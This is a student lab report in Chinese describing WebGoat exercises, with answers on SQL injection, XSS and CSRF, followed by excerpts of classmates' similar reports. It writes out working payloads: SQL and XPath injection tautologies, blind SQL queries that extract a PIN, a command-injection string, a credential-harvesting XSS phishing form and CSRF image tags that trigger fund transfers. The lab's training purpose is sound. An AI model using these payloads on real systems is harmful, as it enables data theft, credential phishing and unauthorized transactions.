20154321 Exp9: Web安全基础实践

20154321【网络对抗技术】Exp9: Web安全基础实践

一、基础问题

  • SQL注入攻击原理,如何防御
  • SQL注入漏洞是指在Web应用对后台数据库查询语句处理存在的安全漏洞。也就是,在输入字符串中嵌入SQL指令,在设计程序中忽略对可能构成攻击的特殊字符串的检查。后台数据库将其认作正常SQL指令后正常执行,可能实现对后台数据库进行各种操作,甚至造成破坏后台数据库等严重后果。
  • SQL注入一般分为普通注入和盲注。
    • 普通注入:后台数据库会回显有价值的提示信息,通过这些可能的报错信息可以更容易地进行注入,适合新手入门训练。
    • 盲注:后台管理员在给出错误页面时,没有提供详细错误信息。攻击者需要运用脚本通过仅有的判断信息(比如时间差)对表中的每一个字段进行探测,从而实现注入。
  • 防御:对输入的数据进行过滤,过滤掉敏感字符。加密数据库。
  • XSS攻击的原理,如何防御
  • 攻击者利用网站漏洞(通常这些漏洞是指网站后台处理程序没有很好的对用户输入进行过滤),输入可以显示在页面上的、对其他用户造成影响的HTML代码;由于受害者浏览器对目标服务器的信任,当其访问目标服务器上被注入恶意脚本的页面后,这段恶意脚本可以顺利执行,实现获取用户cookie并可以利用用户身份进行非法操作的目的。
  • 浏览器自身可以识别简单的XSS攻击字符串,从而阻止简单的XSS攻击;从根本上说,解决办法是消除网站的XSS漏洞,这就需要网站开发者运用转义安全字符等手段。
  • CSRF攻击原理,如何防御
  • CSRF攻击的主要目的是让用户在不知情的情况下攻击自己已登录的一个系统,类似于钓鱼。如用户当前已经登录了邮箱,或bbs,同时用户又在使用另外一个,已经被你控制的站点,我们姑且叫它钓鱼网站。这个网站上面可能因为某个图片吸引你,你去点击一下,此时可能就会触发一个js的点击事件,构造一个bbs发帖的请求,去往你的bbs发帖,由于当前你的浏览器状态已经是登陆状态,所以session登陆cookie信息都会跟正常的请求一样,纯天然的利用当前的登陆状态,让用户在不知情的情况下,帮你发帖或干其他事情
  • 通过 referer、token 或者 验证码 来检测用户提交。尽量不要在页面的链接中暴露用户隐私信息。对于用户修改删除等操作最好都使用post 操作

二、实践过程

1.开启webgoat

在终端中输入java -jar webgoat-container-7.1-exec.jar开启 WebGoat

打开浏览器,在地址栏输入 localhost:8080/WebGoat 打开 WebGoat,选择默认账号、密码即可登陆成功。

1.SQL字符串注入(String SQL Injection)

SQL注入攻击,入手点在web 但是从根本上来说是SQL的问题。尝试注入一个SQL字符串,以显示所有信用卡号码。 尝试使用‘Smith‘的用户名。

输入‘or 1=‘1,语句就变成SELECT * FROM user_data WHERE last_name = ‘‘or 1=‘1‘

这句的意思就是查询lastname= ‘‘ (或者)1=‘1‘ ,这里的 1=‘1‘ 永远为真,所以不管姓啥都是对的,都能被显示出来,这是最简单的SQL注入攻击。主要防御方式是字符串过滤。

如下图所示:

2、日志欺骗(Log Spoofing)

日志欺骗主要就是利用日志的格式,使用换行等字符,欺骗管理员。

比如输入huangrui%0d%0aLogin Succeeded for username: admin,密码随意

url参数带有%0d%0a , 在servlet里得到包含这个字段的string时, %0d%0a 就会被转义为回车。

3、数字型SQL注入(Numeric SQL Injection)

题目就是要求这个表单允许使用者看到天气数据,利用SQL注入使得可以看见所有数据

在网页右键选中inspect Element对源代码进行修改,找到任意一个值比如101旁边加上 or 1=1

然后点击 :go, 成功。

4、命令注入(Command Injection)

题目大概就是要尝试给操作系统注入命令行,要求能够在目标主机上执行系统命令

我们还是右击选中inspect Element进行代码修改。

例如在BackDoors.help旁边加上"& netstat -an & ipconfig"。

点击view.

5.XPATH Injection

题目大概意思就是使用帐户Mik/Test123,试着去查看其他员工的数据。

使用一个普通的用户名和密码,XPath会起作用,但是攻击者可能会发送一个坏用户名和密码,并在不知道用户名或密码的情况下,选择一个XML节点,我们也创造一个类似的永真式:

Username: huangrui‘ or 1=1 or ‘a‘=‘a
passwoad:huangrui

6、数字盲注(Blind Numeric SQL Injection)

题目中说明了下面的表单允许用户输入帐号并确定它是否有效,即返回值只有账户有效或无效两种。

先输入101 AND ((SELECT pin FROM pins WHERE cc_number=‘1111222233334444‘) > 10000);,结果是

Invalid account number.无效。所以我们还要缩小范围。

这个时候又显示Account number is valid,也说明确实存在这个账户。

最后经过多次尝试,找到2364

7、盲字符串注入(Blind String SQL Injection)

和上一个差不多,只是由猜数字变成猜字符,方法都差不多。

使用语句 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number=‘4321432143214321‘), 1, 1) < ‘K‘ ) 查询第一个字符。

然后又试了H,它显示无效,所以就可以确定是H到K之间。

然后再使用语句 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number=‘4321432143214321‘), 2, 1) < ‘r‘ ) 查询第二个字符。

以此类推。最后查询出来为Jill.

Cross-Site Scripting (XSS)

8、跨站脚本钓鱼攻击(Phishing with XSS)

这道题是关于一个页面中存在XSS漏洞时,他如何支持钓鱼攻击。要求我们利用xss和html注入达到这些目标。

使用XSS和HTML插入制作一个钓鱼网站,将下面的代码输在search框中:

</form>

<script>

function hack(){

XSSImage=new Image;

XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";

alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);

}

</script>

<form name="phish">

<br><br>

<HR>

<H2>This feature requires account login:</H2>

<br>

<br>Enter Username:<br> <input type="text" name="user">

<br>Enter Password:<br> <input type="password" name = "pass">

<br> <input type="submit" name="login" value="login" onclick="hack()">

</form>

<br>

<br>

<HR>

然后下拉网页,会有用户名和密码的框出现,随意输入用户名和密码

9、存储型xss(Stored XSS Attacks)

这道题是我们要在信息中添加一个html的标签。

那就在信息框里写一句<script>alert("you are so beautiful~");</script>,然后点击提交之后,留言板上会出现这条信息的标题,标题随意。

点击标题

10.

CSRF

Cross Site Request Forgery(CSRF)

要求:需要写一个URL诱使其他用户点击,从而触发CSRF攻击.
我们可以以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的,用户一旦点击图片,就会触发一个CSRF事件。

1.查看自己电脑的Screen和menu的值

2.在信息框内输入<img src="http://localhost:8080/WebGoat/attack?Screen=2078372&menu=900&transferFunds=1000000"/>(这句话的意思是将Funds即金钱转到自己的账户里),点击提交之后可以看到信息

3.点进去后,盗取钱财。攻击成功

11.

CSRF Prompt By-Pass

和上一个类似,发个邮件给newsgrooup,包含两个恶意请求:一个是转钱的金额,另一个是确认转账。

1.首先还是查看电脑的Screen和menu的值

2.在信息框输入

<img src="attack?Screen=1471017872&menu=900&transferFunds=5000"
width="1" height="1">
<img src="attack?Screen=1471017872&menu=900&transferFunds=confirm"
width="1" height="1">

点击提交后可看到

3.点进去,发现攻击成功

三.实验心得:

最后一次实验了,想着考完试后的周五检查所以也没着急,圆满完成。这课确实也学到了很多实在的东西,老师幸苦了,welldown!




原文地址:https://www.cnblogs.com/hsy20154321/p/9136575.html
				


				
时间: 2024-11-07 08:00:38 

		


		


	

	
	

		


		
20154321  Exp9: Web安全基础实践的相关文章


								

		

			

                20145317彭垚《网络对抗》Exp9 Web安全基础实践
			

		

		

									

				20145317彭垚<网络对抗>Exp9 Web安全基础实践 基础问题回答 SQL注入攻击原理,如何防御? SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令的目的. 对于SQL注入攻击的防范,我觉得主要还是应该从代码上入手: 采用预编译语句集PreparedStatement,它内置了处理SQL注入的能力,只要使用它的setXXX方法传值即可.它的原理就是sql注入只对sql语句的准备(编译)过程有破坏作用,而Prep			

		

	

				

		

			

                20145301赵嘉鑫 《网络对抗》Exp9 Web安全基础实践
			

		

		

									

				20145301赵嘉鑫 <网络对抗>Exp9 Web安全基础实践 实验后回答问题 (1)SQL注入攻击原理,如何防御 SQL注入攻击原理:SQL 是一门 ANSI 的标准计算机语言,用来访问和操作数据库系统.SQL 语句用于取回和更新数据库中的数据.SQL注入是一种通过操作输入来修改后台SQL语句达到代码执行进行攻击目的的技术.通过构建特殊的输入作为参数传入web应用程序,通过执行SQL语句进执行攻击者所要的操作,其主要原因是程序没有细致的过滤用户输入的数据,致使非法数据侵入系统. SQL注入			

		

	

				

		

			

                20145207  Exp9 web安全基础实践
			

		

		

									

				Exp9 web安全基础实践 实验后回答问题 (1)SQL注入攻击原理,如何防御(还不会做..看的别人的感觉是这个意思) 攻击原理:修改信息 防御:禁止输入 (2)XSS攻击的原理,如何防御 攻击原理:看别人的博客,感觉就是强制访问. 防御:.....不清楚 (3)CSRF攻击原理,如何防御 没做,不知道 实验总结与体会 指导下完成,就争取完成最低标准吧,xxs弄完了,sql看不懂,回去再看看吧.先把sql提交上去. XSS注入攻击 Stored XSS Attacks 代码: <script>			

		

	

				

		

			

                20145236《网络对抗》Exp9 web安全基础实践
			

		

		

									

				20145236<网络对抗>Exp9 web安全基础实践 一.基础问题回答: SQL注入攻击原理,如何防御 SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. 利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句. 对用户的输入进行校验,可以通过正则表达式,或限制长			

		

	

				

		

			

                20155308《网络对抗》Exp9 Web安全基础实践
			

		

		

									

				20155308<网络对抗>Exp9 Web安全基础实践 本实践的目标理解常用网络攻击技术的基本原理.Webgoat实践下相关实验. 实验过程 WebGoat WebGoat是OWASP组织研制出的用于进行web漏洞实验的应用平台,用来说明web应用中存在的安全漏洞.WebGoat运行在带有java虚拟机的平台之上,目前提供的训练课程有很多,包含了XSS.线程安全.SQL注入等,我们本次的实验就是在WebGoat平台上进行. 1.WebGoat分为简单版和开发板,简单版是个Java的Jar包,			

		

	

				

		

			

                20155216 Exp9 Web安全基础实践
			

		

		

									

				Exp9 Web安全基础实践 基础问题回答 1.SQL注入攻击原理,如何防御? 1.对用户的输入进行校验,可以通过正则表达式,双"-"进行转换等. 2.不要使用动态拼装sql,可以使用参数化的sql或者直接使用存储过程进行数据查询存取. 3.不要使用管理员权限的数据库连接,为每个应用使用单独的权限有限的数据库连接. 4.不要把机密信息直接存放,加密或者hash掉密码和敏感的信息. 5.应用的异常信息应该给出尽可能少的提示. 6.采取辅助软件或网站平台来检测sql注入. 2.XSS攻击的			

		

	

				

		

			

                20155223 Exp9 Web安全基础实践
			

		

		

									

				20155223 Exp9 Web安全基础实践 基础问题回答 SQL注入攻击原理,如何防御? 攻击原理:SQL注入即是指web应用程序对用户输入数据的合法性没有判断,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息. 防御手段: 在数据库设置防火墙,专注防御SQL注入攻击. 不再使用动态拼接SQL语句,可以使用参数化的sql或者直接使用存储过程进行数据查询存取. 用加密方式或Hash函数来存			

		

	

				

		

			

                20155210 Exp9 Web安全基础实践
			

		

		

									

				Exp9 Web安全基础实践 实验过程 开启webgoat 输入java -jar webgoat-container-7.1-exec.jar,来运行webgoat 在浏览器输入localhost:8080/WebGoat,进入WebGoat开始实验 根据下图提示进行登录 XSS攻击 1.Phishing with XSS (网路钓鱼) 在搜索框中输入XSS攻击代码,利用XSS可以在已存在的页面中进一步添加元素的特点.我们先创建一个form,让受害人在我们创建的form中填写用户名和密码,再添			

		

	

				

		

			

                20155204《网络对抗》Exp9 Web安全基础实践
			

		

		

									

				20155204<网络对抗>Exp9 Web安全基础实践 一.基础问题回答 SQL注入攻击原理,如何防御? 原理: SQL注入即是指web应用程序对用户输入数据的合法性没有判断,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息. 防御: 1.普通用户与系统管理员用户的权限要有严格的区分.如果一个普通用户在使用查询语句中嵌入另一个Drop Table语句,那么是否允许执行呢?由于Drop语句